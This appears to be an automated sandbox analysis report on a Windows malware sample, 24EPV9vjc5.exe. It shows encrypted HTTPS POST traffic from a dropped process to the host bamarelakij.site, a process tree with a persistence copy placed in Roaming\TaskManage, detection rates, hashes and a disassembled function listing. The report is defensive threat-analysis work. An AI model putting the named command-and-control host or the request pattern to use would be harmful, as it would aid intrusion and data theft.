2025-01-09 13:57:01 UTC	15331	OUT	Data Raw: 2b 2a 2d a5 27 23 26 17 3c 36 b9 3c 80 00 08 00 01 02 00 00 00 00 00 00 83 02 00 00 00 00 00 00 80 01 02 fe fd a9 aa a0 2b 2a 2d a5 27 23 26 28 22 aa a4 a5 a4 28 a9 a8 25 22 2b a3 a0 28 a3 2c a5 22 a7 24 ac 24 27 a7 ab 24 26 2a aa ac 24 aa 21 28 2d 27 a0 a3 24 2c ab a9 29 a3 a2 26 27 2a 2a 26 ab a9 a7 2b a5 24 21 a5 a8 a2 a5 a3 a2 27 a6 a8 22 23 aa ac a8 a2 23 28 aa a6 23 2b a3 23 24 27 24 21 a2 ac a0 a0 25 2b 24 a9 a4 ac 26 a9 26 a3 2b 2d a9 a9 a5 ac 27 a2 23 a7 25 a3 25 2c 28 ab a1 a3 2c a7 21 29 2d 2b 2c 22 ab 22 22 a5 a5 26 22 a3 ab 2b 26 27 a1 a6 a7 25 a5 21 a9 21 ac 23 a6 2a a5 a4 26 2d a7 a7 27 a2 a3 26 2d ab a7 29 aa 27 a7 2a 2c 25 27 a7 2a a3 2c a8 2a aa 21 a7 2c a2 23 24 2b a4 a1 27 27 ac ac 24 a6 29 a3 a1 26 2a 2d 26 ab a8 a7 22 a0 2a ac 25 2d Data Ascii: +-'#&<6<+-'#&("(%"+(,"$$'$&$!(-'$,)&'&+$!'"##(#+#$'$!%+$&&+-'#%%,(,!)-+,"""&"+&'%!!#&-'&-)',%',!,#$+''$)&-&"*%-
2025-01-09 13:57:01 UTC	1634	OUT	Data Raw: 00 00 28 a5 80 01 96 00 96 00 00 04 04 00 ec 0a 1c ab ec 8e 95 5c ff ff ff ff ff ff ff ff 8d 00 0e 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff a3 39 b0 31 31 b2 39 97 32 b7 b1 b9 97 21 27 a0 a3 a6 a3 a9 28 26 a7 17 35 38 b3 80 00 0c 00 01 02 00 00 00 00 00 00 83 02 00 00 00 00 00 00 ba c7 00 00 00 00 00 00 28 a5 80 01 96 00 96 00 00 04 04 00 ec 0a 1c ab a0 6c ae 6e ff ff ff ff ff ff ff ff 93 00 0e 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff a3 39 b0 31 31 b2 39 97 32 b7 b1 b9 97 21 27 a0 a3 a6 a3 a9 28 26 a7 97 a2 23 a7 ac 23 21 a7 26 2c a0 17 3c 36 b9 3c 80 00 0c 00 01 02 00 00 00 00 00 00 83 02 00 00 00 00 00 00 d0 86 80 00 00 00 00 00 28 a5 80 01 96 00 96 00 00 04 04 00 ec 0a 1c ab 3a fc 71 a7 ff ff ff ff ff ff ff ff 92 00 0e 00 00 00 00 00 00 00 00 Data Ascii: (\91192!'(&58(ln91192!'(&##!&,<6<(:q
2025-01-09 13:57:01 UTC	731	IN	HTTP/1.1 204 No Content Date: Thu, 09 Jan 2025 13:57:01 GMT Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YRCrtKwaGtaTHEO%2BqpGcNANi9v%2FipKBz4sEwvDZzT3HF9biGpnM4pD7z3daOCKpriUm3LE1wpkJ8E7zZ%2F6foicpBZ3R3WfgQo4NxEPb%2FqCVPODaQpwbiz9QQd6mOOr4LG45d"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff4ef1d1aae5e6a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2042&min_rtt=1574&rtt_var=1527&sent=31&recv=85&lost=0&retrans=0&sent_bytes=2837&recv_bytes=79573&delivery_rate=548459&cwnd=224&unsent_bytes=0&cid=41408e28bdd2b84d&ts=415&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.10	50101	172.67.174.91	443	6996	C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:57:03 UTC	428	OUT	POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15 fileid: MIInk2VASMakRiAiuFh4O58vm3Lst27Hf6ZO4CPW7oP+2v/W8WPumTC8rWVJF1+o Content-Length: 68855 Host: bamarelakij.site
2025-01-09 13:57:03 UTC	15331	OUT	Data Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 01 bc 0c 01 00 08 00 00 00 52 00 00 00 c2 21 66 25 95 a7 40 16 d7 35 c9 59 af 06 00 00 00 00 00 00 00 00 00 00 61 90 33 92 cd 60 53 99 18 19 1a 9c 1a 52 31 39 b7 b5 c9 05 00 e6 25 b2 c8 49 e6 82 00 e6 02 00 e7 00 00 00 80 ff 7a 00 00 ec 13 a4 37 3a b2 36 14 29 94 10 a1 b7 39 b2 14 2a a6 94 19 10 a1 28 aa 10 1b 1b 18 18 10 20 10 19 17 1a 18 10 a3 24 3d c8 df a6 b4 b1 39 b7 b9 b7 33 3a 10 21 b0 b9 b4 b1 10 22 b4 b9 38 36 b0 bc 10 a0 32 b0 38 3a b2 39 60 e1 6e 00 6a 50 53 a9 bc b9 3a b2 b6 54 29 b2 b3 b4 b9 3a 39 bc 54 b9 b6 b9 b9 17 b2 3c b2 d4 b1 b9 39 b9 b9 17 b2 3c b2 d5 bb b4 37 b4 37 b4 3a 17 b2 3c b2 d4 b1 b9 39 b9 b9 17 b2 3c b2 56 bb b4 37 36 b7 b3 b7 37 17 b2 3c b2 56 b9 b2 39 3b b4 b1 b2 b9 17 Data Ascii: R!f%@5Ya3`SR19%Iz7:6)9*( $=93:!"8628:9`njPS:T):9T<9<77:<9<V767<V9;
2025-01-09 13:57:03 UTC	15331	OUT	Data Raw: 79 34 ff 02 3f 8c cb c0 49 17 ee f1 30 1a f5 b8 f9 c5 c2 5e fb 4f 05 be e9 42 0e e7 5d c7 2a 7a 3b 4c 6f 32 f0 fb 77 f7 ed 9c 33 d7 bb 1e 29 e2 0b e2 03 c9 eb db 74 a0 6b ff 5e ab 7e 5f 9a 22 7e d3 ae 67 c7 c3 af 62 ff 87 22 7f cd 61 48 29 4a 60 30 7c d6 0a b9 ba ca 7c b4 4c 79 a5 83 de 6c ff 09 d3 68 7a 7f 81 81 3f 76 89 bf ed d2 64 75 f0 e9 53 ae 6d 35 a4 70 14 58 58 7e b8 d8 94 47 14 7f ed 0f 73 ef 69 d2 b0 67 a7 55 84 8a 63 7e 83 f4 3a dc bd fe 20 04 36 c5 9f d3 7e c3 b8 6c af 4a 6b af 1b 91 df f7 2e df 1d 20 77 df 64 e1 35 d6 a5 17 3f 32 b4 e4 56 1e 43 c9 d9 f4 18 1e 25 1e 18 4f eb 97 df 1f 0c 76 4a 37 52 87 e6 be 8f 56 6b f4 01 51 3b ef 9d 64 8f ba b6 c9 49 84 0b 15 9a 2a 67 d4 5a ac 45 c5 fa fa ca 3b 47 0f ca 67 fd 27 cf 6f 59 6f e8 32 f7 39 0c 7e Data Ascii: y4?I0^OB]z;Lo2w3)tk^~_"~gb"aH)J`0\|\|Lylhz?vduSm5pXX~GsigUc~: 6~lJk. wd5?2VC%OvJ7RVkQ;dIgZE;Gg'oYo29~
2025-01-09 13:57:03 UTC	15331	OUT	Data Raw: b1 3a 49 d2 13 55 af 7d 1a e9 b1 03 d4 51 7b 7f 85 9a fe b3 45 2e 51 80 96 1f 0d 30 c7 5b ec 05 ec 52 0f eb 27 8c 43 cf 8d 9b 39 2d ee be 47 0f 7e da 9d e6 3f 0b 75 87 a8 0d c4 ae 24 33 84 64 be 45 ee 46 9d b6 a7 74 5f 3b 47 dc ba c8 1d 43 43 0f 15 9f f7 6c 32 87 83 9f d9 37 3a fd 7d 52 2d 66 e9 15 b6 fd f5 e9 d0 ac 9a 5d 26 13 15 80 6f 0b fc d9 2b 21 a4 e8 da 92 5e 2c 12 28 ff 79 85 5a bd 0b 84 16 ef d7 86 2f db 2d 1e f5 36 b4 a8 ef 6c 38 45 a2 6e d4 98 ad e7 cb 2e c4 b3 0d 54 47 04 e1 7f 48 8d 75 9e 27 ae 69 6d c8 d6 21 c7 58 5e 6c 17 d3 93 f3 d6 79 ba 71 a8 d4 84 77 16 d4 39 66 43 de 16 82 41 91 dd d4 a5 73 4a b6 0e 4f a9 4f 69 a6 56 70 c1 5a 9f e9 2f d6 94 7e ef 46 f7 e5 72 ff bd ac 2f b8 3a 2a 90 66 20 51 4d 62 d2 c8 7e af c5 7a bf c8 57 4e 62 92 7b Data Ascii: :IU}Q{E.Q0[R'C9-G~?u$3dEFt_;GCCl27:}R-f]&o+!^,(yZ/-6l8En.TGHu'im!X^lyqw9fCAsJOOiVpZ/~Fr/:*f QMb~zWNb{
2025-01-09 13:57:03 UTC	15331	OUT	Data Raw: 15 a8 65 22 a4 6c c4 71 86 b9 51 db 17 4f fe f0 84 8f a2 07 79 95 b0 60 6f d8 0c cc 76 d6 34 3d d5 76 87 92 34 2f 5e 66 1b 6b 8d 2d 01 c4 8f 1c 53 51 14 a1 c5 81 73 e6 b1 87 79 c5 12 85 83 39 89 a1 16 a3 91 7a 2f bb be e4 c8 5b 32 8f 4a 88 59 0f b7 22 18 4b 38 a4 81 97 64 c8 20 c1 ad c4 31 4f ad 71 18 23 98 fc 1a da b2 a4 2c ed ce bd 55 c4 bb fe 3e 23 2d 13 2d 33 ec 0e 0f 37 cb be bf 94 f4 4b f6 ac 7a f6 26 f4 9a cf c8 3b 32 30 d6 c8 eb f9 d2 6c d2 3a c0 c1 7e 50 00 fa 69 14 22 b2 e0 50 ef 94 09 18 0f 79 d3 bc ae 96 13 11 1e d1 d7 3a be 41 11 5c 24 53 fb 72 d5 64 f3 88 89 c3 40 2c d3 c1 3e b9 dc b1 44 2c 7e 14 9b af fc f3 98 c5 91 14 62 cf e5 12 d9 f7 6d de 63 10 45 dd a9 7e c9 d3 9d ae 2b 9e c2 19 16 cd cd 2a bb f6 c2 04 be 85 45 82 f8 f1 51 15 71 68 ad Data Ascii: e"lqQOy`ov4=v4/^fk-SQsy9z/[2JY"K8d 1Oq#,U>#--37Kz&;20l:~Pi"Py:A\$Srd@,>D,~bmcE~+*EQqh
2025-01-09 13:57:03 UTC	7531	OUT	Data Raw: 20 9d f4 e1 c3 e7 6f 03 07 63 ea 5c bd 4f bc e8 d2 36 f3 b3 d8 5f c6 35 0b 84 b6 32 df b5 c4 02 47 5f 05 2f 58 c2 f6 22 9b 56 d6 bc 48 ca 58 bc 68 68 a5 52 96 24 9f d1 e6 2e be a0 34 dc 01 4d 5c 54 03 0c 67 46 b1 7d f1 67 7b 27 4b 3c ab 64 fd 8d 0b 63 9f 73 d2 b9 59 8e a6 13 5c 16 ae 1c 0c 2a 16 29 f5 69 3e 67 a8 3c 9c 6f ea 94 45 48 e6 3d e9 dc 08 95 f1 4c ee d7 18 13 75 14 53 4e 06 b1 8d 0b 80 79 85 75 c6 34 30 d9 06 da da 25 9d d2 97 e5 dd d2 41 0b 95 0a 07 75 18 9f 4d ca fa 1f 1c 1f 89 5c bb 09 ff d0 ba 71 61 15 4c 46 c2 ac c7 b1 2c 74 6f c3 36 69 f3 87 cc 6f 03 67 a0 d5 45 3c ec af 79 32 2b 99 bf 0d c8 de 90 68 17 d9 95 a5 7b 32 9e ab 29 1e 79 e4 b8 61 26 b6 45 34 ba 5c 7f 25 9e 6f 83 8f 89 71 78 d2 0b 89 4a 9a be fb 6f 15 79 4d 7b a4 ad 3f 75 93 ae Data Ascii: oc\O6_52G_/X"VHXhhR$.4M\TgF}g{'K<dcsY\*)i>g<oEH=LuSNyu40%AuM\qaLF,to6iogE<y2+h{2)ya&E4\%oqxJoyM{?u
2025-01-09 13:57:03 UTC	725	IN	HTTP/1.1 204 No Content Date: Thu, 09 Jan 2025 13:57:03 GMT Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EQpOaN%2FttdklXdOsJuDDyJ50w0NgiVVqHcSv3lqAo210m5nHrhihu7j4d4zxUSKAX9RreUbrtHTShXvNClKYgNLoXVcJauyusmRfuGWM3E588uZ0RiQL1lIIYAUGSXPKu8rD"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff4ef282afff795-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1706&min_rtt=1703&rtt_var=646&sent=30&recv=76&lost=0&retrans=0&sent_bytes=2838&recv_bytes=70095&delivery_rate=1683967&cwnd=187&unsent_bytes=0&cid=6cde90517bdfb82e&ts=492&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.10	50102	172.67.174.91	443	6996	C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:57:04 UTC	425	OUT	POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15 fileid: MIInk2VASMakRiAiuFh4O58vm3Lst27Hf6ZO4CPW7oP+2v/W8WPumTC8rWVJF1+o Content-Length: 35 Host: bamarelakij.site
2025-01-09 13:57:04 UTC	35	OUT	Data Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 02 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii:
2025-01-09 13:57:04 UTC	730	IN	HTTP/1.1 204 No Content Date: Thu, 09 Jan 2025 13:57:04 GMT Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WyRHO%2FWIds0G%2BNy2JAoKGsFFjLavPF7XDhCOq1UUlHr%2F41OvpLhivYyQqo1TF%2F4QB6OaQDXVZFsxh2v2N1WjqeYyGKF8kEH9J1SKjIi1bNN9cFImbFgKGmJ%2BNvQzVKxKIAf3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff4ef2ecd9d8ca5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2011&min_rtt=2000&rtt_var=772&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1096&delivery_rate=1397797&cwnd=237&unsent_bytes=0&cid=7138dafc5297439f&ts=335&x=0"

Target ID:	0
Start time:	08:54:45
Start date:	09/01/2025
Path:	C:\Users\user\Desktop\24EPV9vjc5.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\24EPV9vjc5.exe"
Imagebase:	0xc0000
File size:	15'692'672 bytes
MD5 hash:	EC4072E1AE2A9316270E6AFD66235A97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	08:54:46
Start date:	09/01/2025
Path:	C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe" -burn.clean.room="C:\Users\user\Desktop\24EPV9vjc5.exe" -burn.filehandle.attached=676 -burn.filehandle.self=520
Imagebase:	0x650000
File size:	15'692'672 bytes
MD5 hash:	EC4072E1AE2A9316270E6AFD66235A97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 47%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	08:54:48
Start date:	09/01/2025
Path:	C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe
Imagebase:	0x7d0000
File size:	6'487'736 bytes
MD5 hash:	11C8962675B6D535C018A63BE0821E4C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 3%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	08:54:49
Start date:	09/01/2025
Path:	C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe
Imagebase:	0x8b0000
File size:	6'487'736 bytes
MD5 hash:	11C8962675B6D535C018A63BE0821E4C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 3%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	08:54:51
Start date:	09/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0xd70000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	08:54:51
Start date:	09/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	08:55:17
Start date:	09/01/2025
Path:	C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Imagebase:	0x140000000
File size:	2'364'728 bytes
MD5 hash:	967F4470627F823F4D7981E511C9824F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	08:55:28
Start date:	09/01/2025
Path:	C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe"
Imagebase:	0x8b0000
File size:	6'487'736 bytes
MD5 hash:	11C8962675B6D535C018A63BE0821E4C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	08:55:28
Start date:	09/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0xd70000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	08:55:28
Start date:	09/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	08:55:49
Start date:	09/01/2025
Path:	C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Imagebase:	0x140000000
File size:	2'364'728 bytes
MD5 hash:	967F4470627F823F4D7981E511C9824F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	08:56:04
Start date:	09/01/2025
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default"
Imagebase:	0x7ff6a9290000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	08:56:05
Start date:	09/01/2025
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Imagebase:	0x7ff6a9290000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	18
Start time:	08:56:05
Start date:	09/01/2025
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2200 --field-trial-handle=2060,i,18088822377575541774,13344456101487118209,262144 /prefetch:3
Imagebase:	0x7ff6a9290000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	08:56:06
Start date:	09/01/2025
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2864 --field-trial-handle=2068,i,8123229788222533181,5144099982838419640,262144 /prefetch:3
Imagebase:	0x7ff6a9290000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	24
Start time:	08:56:12
Start date:	09/01/2025
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6732 --field-trial-handle=2068,i,8123229788222533181,5144099982838419640,262144 /prefetch:8
Imagebase:	0x7ff6a9290000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	08:56:12
Start date:	09/01/2025
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=5356 --field-trial-handle=2068,i,8123229788222533181,5144099982838419640,262144 /prefetch:8
Imagebase:	0x7ff6a9290000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	08:57:06
Start date:	09/01/2025
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceuserer --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7044 --field-trial-handle=2068,i,8123229788222533181,5144099982838419640,262144 /prefetch:8
Imagebase:	0x7ff6a9290000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Function 000C3CC4 Relevance: 47.6, APIs: 23, Strings: 4, Instructions: 320
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNELBASE(?,?,?,?,00000001,00000000,?), ref: 000C3D40
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 000C3D53
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,00000001,00000000,?), ref: 000C3D9E
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 000C3DA8
GetTempPathW.KERNEL32(00000104,?,?,?,?,00000001,00000000,?), ref: 000C3DF6
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 000C3E00
FindFirstFileW.KERNELBASE(?,?,?,*.*,?,?,?,?,00000001,00000000,?), ref: 000C3E53
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 000C3E64
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,00000001,00000000,?), ref: 000C3F3E
DeleteFileW.KERNELBASE(?,?,?,?,?,?,?,00000001,00000000,?), ref: 000C3F52
GetTempFileNameW.KERNEL32(?,DEL,00000000,?,?,?,?,00000001,00000000,?), ref: 000C3F79
MoveFileExW.KERNEL32(?,?,00000001,?,?,?,00000001,00000000,?), ref: 000C3F9C
MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,00000001,00000000,?), ref: 000C3FB5
FindNextFileW.KERNELBASE(000000FF,?,?,?,?,?,?,?,00000001,00000000,?), ref: 000C3FC5
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 000C3FDA
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 000C4009
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 000C402B
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 000C404D
RemoveDirectoryW.KERNELBASE(?,?,?,?,00000001,00000000,?), ref: 000C4064
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 000C406E
MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,00000001,00000000,?), ref: 000C4095
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 000C40B0
FindClose.KERNEL32(000000FF,?,?,?,00000001,00000000,?), ref: 000C40E6

Strings

*.*, xrefs: 000C3E2C
DEL, xrefs: 000C3F6D
dirutil.cpp, xrefs: 000C3D76, 000C3FFA
4Mw, xrefs: 000C3DF6

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorFileLast$AttributesFindMove$Temp$CloseDeleteDirectoryFirstNameNextPathRemove
String ID: 4Mw$*.*$DEL$dirutil.cpp
API String ID: 1544372074-3821523967
Opcode ID: 02f8faafa7e95ab7ebe194d2dcddfd4d55f47571ca7a123c2e9094b7f6c339c3
Instruction ID: 5a9a3053d3aa78f0988ca5d5ad103cfa0490cdc56186f3e6a6a1814c7bcb0091
Opcode Fuzzy Hash: 02f8faafa7e95ab7ebe194d2dcddfd4d55f47571ca7a123c2e9094b7f6c339c3
Instruction Fuzzy Hash: 41B10772D512399BDB705B648C45F9EB6B9BF40720F1182ADEE48BB190D7728E90CF90

Function 000C5195 Relevance: 38.8, APIs: 5, Strings: 17, Instructions: 315
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?), ref: 000C5217

Part of subcall function 001004F8: InitializeCriticalSection.KERNEL32(0012B5FC,?,000C5223,00000000,?,?,?,?,?,?), ref: 0010050F

Part of subcall function 000C120A: CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,000C523F,00000000,?), ref: 000C1248
